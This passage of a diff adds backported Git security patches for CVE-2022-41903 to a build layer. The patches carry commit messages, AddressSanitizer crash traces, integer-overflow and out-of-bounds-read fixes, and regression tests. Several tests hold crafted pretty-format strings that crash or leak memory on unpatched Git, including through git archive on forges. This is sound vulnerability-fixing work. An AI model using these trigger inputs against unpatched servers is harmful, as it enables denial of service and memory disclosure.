74 Partially addressable: 01 02 03 04 05 06 07
75 Heap left redzone: fa
76 Freed heap region: fd
77 Stack left redzone: f1
78 Stack mid redzone: f2
79 Stack right redzone: f3
80 Stack after return: f5
81 Stack use after scope: f8
82 Global redzone: f9
83 Global init order: f6
84 Poisoned by user: f7
85 Container overflow: fc
86 Array cookie: ac
87 Intra object redzone: bb
88 ASan internal: fe
89 Left alloca redzone: ca
90 Right alloca redzone: cb
91 ==8340==ABORTING
92
93The pretty format can also be used in `git archive` operations via the
94`export-subst` attribute. So this is what in our opinion makes this a
95critical issue in the context of Git forges which allow to download an
96archive of user supplied Git repositories.
97
98Fix this vulnerability by using `size_t` instead of `int` to track the
99string lengths. Add tests which detect this vulnerability when Git is
100compiled with the address sanitizer.
101
102Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
103Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
104Modified-by: Taylor Blau <me@ttalorr.com>
105Signed-off-by: Patrick Steinhardt <ps@pks.im>
106Signed-off-by: Junio C Hamano <gitster@pobox.com>
107
108Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
109CVE: CVE-2022-41903
110Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
111---
112 pretty.c | 11 ++++++-----
113 t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
114 2 files changed, 23 insertions(+), 5 deletions(-)
115
116diff --git a/pretty.c b/pretty.c
117index b32f036..637e344 100644
118--- a/pretty.c
119+++ b/pretty.c
120@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
121 struct format_commit_context *c)
122 {
123 struct strbuf local_sb = STRBUF_INIT;
124- int total_consumed = 0, len, padding = c->padding;
125+ size_t total_consumed = 0;
126+ int len, padding = c->padding;
127+
128 if (padding < 0) {
129 const char *start = strrchr(sb->buf, '\n');
130 int occupied;
131@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
132 }
133 while (1) {
134 int modifier = *placeholder == 'C';
135- int consumed = format_commit_one(&local_sb, placeholder, c);
136+ size_t consumed = format_commit_one(&local_sb, placeholder, c);
137 total_consumed += consumed;
138
139 if (!modifier)
140@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
141 }
142 strbuf_addbuf(sb, &local_sb);
143 } else {
144- int sb_len = sb->len, offset = 0;
145+ size_t sb_len = sb->len, offset = 0;
146 if (c->flush_type == flush_left)
147 offset = padding - len;
148 else if (c->flush_type == flush_both)
149@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
150 const char *placeholder,
151 void *context)
152 {
153- int consumed;
154- size_t orig_len;
155+ size_t consumed, orig_len;
156 enum {
157 NO_MAGIC,
158 ADD_LF_BEFORE_NON_EMPTY,
159diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
160index f42a69f..a2acee1 100755
161--- a/t/t4205-log-pretty-formats.sh
162+++ b/t/t4205-log-pretty-formats.sh
163@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
164 test_cmp expect actual
165 '
166
167+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
168+ # We only assert that this command does not crash. This needs to be
169+ # executed with the address sanitizer to demonstrate failure.
170+ git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
171+'
172+
173+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
174+ test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
175+ huge_commit=$(git commit-tree -F expect HEAD^{tree})
176+'
177+
178+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
179+ git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
180+ echo 0 >>expect &&
181+ test_cmp expect actual
182+'
183+
184 test_done
185--
1862.25.1
187
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
1From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:30 +0100
4Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
5
6With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
7steal spaces. To do so we need to look ahead of the next token to see
8whether there are spaces there. This loop takes into account ANSI
9sequences that end with an `m`, and if it finds any it will skip them
10until it finds the first space. While doing so it does not take into
11account the buffer's limits though and easily does an out-of-bounds
12read.
13
14Add a test that hits this behaviour. While we don't have an easy way to
15verify this, the test causes the following failure when run with
16`SANITIZE=address`:
17
18 ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
19 READ of size 1 at 0x603000000baf thread T0
20 #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
21 #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
22 #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
23 #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
24 #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
25 #5 0x55ba6f7884c8 in show_log log-tree.c:781
26 #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
27 #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
28 #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
29 #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
30 #10 0x55ba6f2ea993 in run_builtin git.c:466
31 #11 0x55ba6f2eb397 in handle_builtin git.c:721
32 #12 0x55ba6f2ebb07 in run_argv git.c:788
33 #13 0x55ba6f2ec8a7 in cmd_main git.c:923
34 #14 0x55ba6f581682 in main common-main.c:57
35 #15 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
36 #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
37 #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
38
39 0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
40 allocated by thread T0 here:
41 #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
42 #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
43 #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
44 #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
45 #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
46 #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
47 #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
48 #7 0x55ba6f7884c8 in show_log log-tree.c:781
49 #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
50 #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
51 #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
52 #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
53 #12 0x55ba6f2ea993 in run_builtin git.c:466
54 #13 0x55ba6f2eb397 in handle_builtin git.c:721
55 #14 0x55ba6f2ebb07 in run_argv git.c:788
56 #15 0x55ba6f2ec8a7 in cmd_main git.c:923
57 #16 0x55ba6f581682 in main common-main.c:57
58 #17 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
59 #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
60 #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
61
62 SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
63 Shadow bytes around the buggy address:
64 0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
65 0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
66 0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
67 0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
68 0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
69 =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
70 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
71 0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
72 0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
73 0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
74 0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
75 Shadow byte legend (one shadow byte represents 8 application bytes):
76 Addressable: 00
77 Partially addressable: 01 02 03 04 05 06 07
78 Heap left redzone: fa
79 Freed heap region: fd
80 Stack left redzone: f1
81 Stack mid redzone: f2
82 Stack right redzone: f3
83 Stack after return: f5
84 Stack use after scope: f8
85 Global redzone: f9
86 Global init order: f6
87 Poisoned by user: f7
88 Container overflow: fc
89 Array cookie: ac
90 Intra object redzone: bb
91 ASan internal: fe
92 Left alloca redzone: ca
93 Right alloca redzone: cb
94
95Luckily enough, this would only cause us to copy the out-of-bounds data
96into the formatted commit in case we really had an ANSI sequence
97preceding our buffer. So this bug likely has no security consequences.
98
99Fix it regardless by not traversing past the buffer's start.
100
101Reported-by: Patrick Steinhardt <ps@pks.im>
102Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
103Signed-off-by: Patrick Steinhardt <ps@pks.im>
104Signed-off-by: Junio C Hamano <gitster@pobox.com>
105
106Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
107CVE: CVE-2022-41903
108Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
109---
110 pretty.c | 2 +-
111 t/t4205-log-pretty-formats.sh | 6 ++++++
112 2 files changed, 7 insertions(+), 1 deletion(-)
113
114diff --git a/pretty.c b/pretty.c
115index 637e344..4348a82 100644
116--- a/pretty.c
117+++ b/pretty.c
118@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
119 if (*ch != 'm')
120 break;
121 p = ch - 1;
122- while (ch - p < 10 && *p != '\033')
123+ while (p > sb->buf && ch - p < 10 && *p != '\033')
124 p--;
125 if (*p != '\033' ||
126 ch + 1 - p != display_mode_esc_sequence_len(p))
127diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
128index a2acee1..e69caba 100755
129--- a/t/t4205-log-pretty-formats.sh
130+++ b/t/t4205-log-pretty-formats.sh
131@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
132 test_cmp expect actual
133 '
134
135+test_expect_success 'log --pretty with space stealing' '
136+ printf mm0 >expect &&
137+ git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
138+ test_cmp expect actual
139+'
140+
141 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
142 # We only assert that this command does not crash. This needs to be
143 # executed with the address sanitizer to demonstrate failure.
144--
1452.25.1
146
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
new file mode 100644
index 0000000000..9e3c74ff67
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
1From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:34 +0100
4Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
5
6An out-of-bounds read can be triggered when parsing an incomplete
7padding format string passed via `--pretty=format` or in Git archives
8when files are marked with the `export-subst` gitattribute.
9
10This bug exists since we have introduced support for truncating output
11via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
12and %><, 2013-04-19). Before this commit, we used to find the end of the
13formatting string by using strchr(3P). This function returns a `NULL`
14pointer in case the character in question wasn't found. The subsequent
15check whether any character was found thus simply checked the returned
16pointer. After the commit we switched to strcspn(3P) though, which only
17returns the offset to the first found character or to the trailing NUL
18byte. As the end pointer is now computed by adding the offset to the
19start pointer it won't be `NULL` anymore, and as a consequence the check
20doesn't do anything anymore.
21
22The out-of-bounds data that is being read can in fact end up in the
23formatted string. As a consequence, it is possible to leak memory
24contents either by calling git-log(1) or via git-archive(1) when any of
25the archived files is marked with the `export-subst` gitattribute.
26
27 ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
28 READ of size 1 at 0x602000000398 thread T0
29 #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
30 #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
31 #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
32 #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
33 #4 0x563b7cca04c8 in show_log log-tree.c:781
34 #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
35 #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
36 #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
37 #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
38 #9 0x563b7c802993 in run_builtin git.c:466
39 #10 0x563b7c803397 in handle_builtin git.c:721
40 #11 0x563b7c803b07 in run_argv git.c:788
41 #12 0x563b7c8048a7 in cmd_main git.c:923
42 #13 0x563b7ca99682 in main common-main.c:57
43 #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
44 #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
45 #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
46
47 0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
48 allocated by thread T0 here:
49 #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
50 #1 0x563b7cf7317c in xstrdup wrapper.c:39
51 #2 0x563b7cd9a06a in save_user_format pretty.c:40
52 #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
53 #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
54 #5 0x563b7ce597c9 in setup_revisions revision.c:2850
55 #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
56 #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
57 #8 0x563b7c92b193 in cmd_log builtin/log.c:882
58 #9 0x563b7c802993 in run_builtin git.c:466
59 #10 0x563b7c803397 in handle_builtin git.c:721
60 #11 0x563b7c803b07 in run_argv git.c:788
61 #12 0x563b7c8048a7 in cmd_main git.c:923
62 #13 0x563b7ca99682 in main common-main.c:57
63 #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
64 #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
65 #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
66
67 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
68 Shadow bytes around the buggy address:
69 0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
70 0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
71 0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
72 0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
73 0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
74 =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
75 0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
76 0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
77 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
78 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
79 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
80 Shadow byte legend (one shadow byte represents 8 application bytes):
81 Addressable: 00
82 Partially addressable: 01 02 03 04 05 06 07
83 Heap left redzone: fa
84 Freed heap region: fd
85 Stack left redzone: f1
86 Stack mid redzone: f2
87 Stack right redzone: f3
88 Stack after return: f5
89 Stack use after scope: f8
90 Global redzone: f9
91 Global init order: f6
92 Poisoned by user: f7
93 Container overflow: fc
94 Array cookie: ac
95 Intra object redzone: bb
96 ASan internal: fe
97 Left alloca redzone: ca
98 Right alloca redzone: cb
99 ==10888==ABORTING
100
101Fix this bug by checking whether `end` points at the trailing NUL byte.
102Add a test which catches this out-of-bounds read and which demonstrates
103that we used to write out-of-bounds data into the formatted message.
104
105Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
106Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
107Signed-off-by: Patrick Steinhardt <ps@pks.im>
108Signed-off-by: Junio C Hamano <gitster@pobox.com>
109
110Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
111CVE: CVE-2022-41903
112Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
113---
114 pretty.c | 2 +-
115 t/t4205-log-pretty-formats.sh | 6 ++++++
116 2 files changed, 7 insertions(+), 1 deletion(-)
117
118diff --git a/pretty.c b/pretty.c
119index 4348a82..c49e818 100644
120--- a/pretty.c
121+++ b/pretty.c
122@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
123 const char *end = start + strcspn(start, ",)");
124 char *next;
125 int width;
126- if (!end || end == start)
127+ if (!*end || end == start)
128 return 0;
129 width = strtol(start, &next, 10);
130 if (next == start || width == 0)
131diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
132index e69caba..8a349df 100755
133--- a/t/t4205-log-pretty-formats.sh
134+++ b/t/t4205-log-pretty-formats.sh
135@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
136 test_cmp expect actual
137 '
138
139+test_expect_success 'log --pretty with invalid padding format' '
140+ printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
141+ git log -1 --pretty="format:%H%<(20" >actual &&
142+ test_cmp expect actual
143+'
144+
145 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
146 # We only assert that this command does not crash. This needs to be
147 # executed with the address sanitizer to demonstrate failure.
148--
1492.25.1
150
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
new file mode 100644
index 0000000000..994f7a55b1
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
1From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:39 +0100
4Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
5
6When a formatting directive has a `+` or ` ` after the `%`, then we add
7either a line feed or space if the placeholder expands to a non-empty
8string. In specific cases though this logic doesn't work as expected,
9and we try to add the character even in the case where the formatting
10directive is empty.
11
12One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
13pointing to a certain commit, like in `git log --decorate`. For a tagged
14commit this would for example expand to `\n (tag: v1.0.0)`, which has a
15leading newline due to the `+` modifier and a space added by `%d`. Now
16the second wrapping directive will cause us to rewrap the text to
17`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
18space. The code that handles the `+` magic now notices that the length
19has changed and will thus try to insert a leading line feed at the
20original posititon. But as the string was shortened, the original
21position is past the buffer's boundary and thus we die with an error.
22
23Now there are two issues here:
24
25 1. We check whether the buffer length has changed, not whether it
26 has been extended. This causes us to try and add the character
27 past the string boundary.
28
29 2. The current logic does not make any sense whatsoever. When the
30 string got expanded due to the rewrap, putting the separator into
31 the original position is likely to put it somewhere into the
32 middle of the rewrapped contents.
33
34It is debatable whether `%+w()` makes any sense in the first place.
35Strictly speaking, the placeholder never expands to a non-empty string,
36and consequentially we shouldn't ever accept this combination. We thus
37fix the bug by simply refusing `%+w()`.
38
39Signed-off-by: Patrick Steinhardt <ps@pks.im>
40Signed-off-by: Junio C Hamano <gitster@pobox.com>
41
42Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
43CVE: CVE-2022-41903
44Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
45---
46 pretty.c | 14 +++++++++++++-
47 t/t4205-log-pretty-formats.sh | 8 ++++++++
48 2 files changed, 21 insertions(+), 1 deletion(-)
49
50diff --git a/pretty.c b/pretty.c
51index c49e818..195d005 100644
52--- a/pretty.c
53+++ b/pretty.c
54@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
55 default:
56 break;
57 }
58- if (magic != NO_MAGIC)
59+ if (magic != NO_MAGIC) {
60 placeholder++;
61
62+ switch (placeholder[0]) {
63+ case 'w':
64+ /*
65+ * `%+w()` cannot ever expand to a non-empty string,
66+ * and it potentially changes the layout of preceding
67+ * contents. We're thus not able to handle the magic in
68+ * this combination and refuse the pattern.
69+ */
70+ return 0;
71+ };
72+ }
73+
74 orig_len = sb->len;
75 if (((struct format_commit_context *)context)->flush_type != no_flush)
76 consumed = format_and_pad_commit(sb, placeholder, context);
77diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
78index 8a349df..fa1bc2b 100755
79--- a/t/t4205-log-pretty-formats.sh
80+++ b/t/t4205-log-pretty-formats.sh
81@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
82 test_cmp expect actual
83 '
84
85+test_expect_success 'log --pretty with magical wrapping directives' '
86+ commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
87+ git tag describe-me $commit_id &&
88+ printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
89+ git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
90+ test_cmp expect actual
91+'
92+
93 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
94 # We only assert that this command does not crash. This needs to be
95 # executed with the address sanitizer to demonstrate failure.
96--
972.25.1
98
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
new file mode 100644
index 0000000000..93fbe5c7fe
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
1From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:49 +0100
4Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
5
6The `%w(width,indent1,indent2)` formatting directive can be used to
7rewrap text to a specific width and is designed after git-shortlog(1)'s
8`-w` parameter. While the three parameters are all stored as `size_t`
9internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
10result, the casted integers may overflow. As these now-negative integers
11are later on passed to `strbuf_addchars()`, we will ultimately run into
12implementation-defined behaviour due to casting a negative number back
13to `size_t` again. On my platform, this results in trying to allocate
149000 petabyte of memory.
15
16Fix this overflow by using `cast_size_t_to_int()` so that we reject
17inputs that cannot be represented as an integer.
18
19Signed-off-by: Patrick Steinhardt <ps@pks.im>
20Signed-off-by: Junio C Hamano <gitster@pobox.com>
21
22Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
23CVE: CVE-2022-41903
24Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
25---
26 git-compat-util.h | 8 ++++++++
27 pretty.c | 4 +++-
28 t/t4205-log-pretty-formats.sh | 12 ++++++++++++
29 3 files changed, 23 insertions(+), 1 deletion(-)
30
31diff --git a/git-compat-util.h b/git-compat-util.h
32index a1ecfd3..b0f3890 100644
33--- a/git-compat-util.h
34+++ b/git-compat-util.h
35@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
36 return a - b;
37 }
38
39+static inline int cast_size_t_to_int(size_t a)
40+{
41+ if (a > INT_MAX)
42+ die("number too large to represent as int on this platform: %"PRIuMAX,
43+ (uintmax_t)a);
44+ return (int)a;
45+}
46+
47 #ifdef HAVE_ALLOCA_H
48 # include <alloca.h>
49 # define xalloca(size) (alloca(size))
50diff --git a/pretty.c b/pretty.c
51index 195d005..ff9fc97 100644
52--- a/pretty.c
53+++ b/pretty.c
54@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
55 if (pos)
56 strbuf_add(&tmp, sb->buf, pos);
57 strbuf_add_wrapped_text(&tmp, sb->buf + pos,
58- (int) indent1, (int) indent2, (int) width);
59+ cast_size_t_to_int(indent1),
60+ cast_size_t_to_int(indent2),
61+ cast_size_t_to_int(width));
62 strbuf_swap(&tmp, sb);
63 strbuf_release(&tmp);
64 }
65diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
66index fa1bc2b..23ac508 100755
67--- a/t/t4205-log-pretty-formats.sh
68+++ b/t/t4205-log-pretty-formats.sh
69@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
70 test_cmp expect actual
71 '
72
73+test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
74+ cat >expect <<-EOF &&
75+ fatal: number too large to represent as int on this platform: 2147483649
76+ EOF
77+ test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
78+ test_cmp expect error &&
79+ test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
80+ test_cmp expect error &&
81+ test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
82+ test_cmp expect error
83+'
84+
85 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
86 # We only assert that this command does not crash. This needs to be
87 # executed with the address sanitizer to demonstrate failure.
88--
892.25.1
90
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
new file mode 100644
index 0000000000..ec248ad6c2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
1From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:53 +0100
4Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
5
6The `utf8_strnwidth()` function accepts an optional string length as
7input parameter. This parameter can either be set to `-1`, in which case
8we call `strlen()` on the input. Or it can be set to a positive integer
9that indicates a precomputed length, which callers typically compute by
10calling `strlen()` at some point themselves.
11
12The input parameter is an `int` though, whereas `strlen()` returns a
13`size_t`. This can lead to implementation-defined behaviour though when
14the `size_t` cannot be represented by the `int`. In the general case
15though this leads to wrap-around and thus to negative string sizes,
16which is sure enough to not lead to well-defined behaviour.
17
18Fix this by accepting a `size_t` instead of an `int` as string length.
19While this takes away the ability of callers to simply pass in `-1` as
20string length, it really is trivial enough to convert them to instead
21pass in `strlen()` instead.
22
23Signed-off-by: Patrick Steinhardt <ps@pks.im>
24Signed-off-by: Junio C Hamano <gitster@pobox.com>
25
26Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
27CVE: CVE-2022-41903
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 column.c | 2 +-
31 pretty.c | 4 ++--
32 utf8.c | 8 +++-----
33 utf8.h | 2 +-
34 4 files changed, 7 insertions(+), 9 deletions(-)
35
36diff --git a/column.c b/column.c
37index 4a38eed..0c79850 100644
38--- a/column.c
39+++ b/column.c
40@@ -23,7 +23,7 @@ struct column_data {
41 /* return length of 's' in letters, ANSI escapes stripped */
42 static int item_length(const char *s)
43 {
44- return utf8_strnwidth(s, -1, 1);
45+ return utf8_strnwidth(s, strlen(s), 1);
46 }
47
48 /*
49diff --git a/pretty.c b/pretty.c
50index ff9fc97..c3c1443 100644
51--- a/pretty.c
52+++ b/pretty.c
53@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
54 int occupied;
55 if (!start)
56 start = sb->buf;
57- occupied = utf8_strnwidth(start, -1, 1);
58+ occupied = utf8_strnwidth(start, strlen(start), 1);
59 occupied += c->pretty_ctx->graph_width;
60 padding = (-padding) - occupied;
61 }
62@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
63 placeholder++;
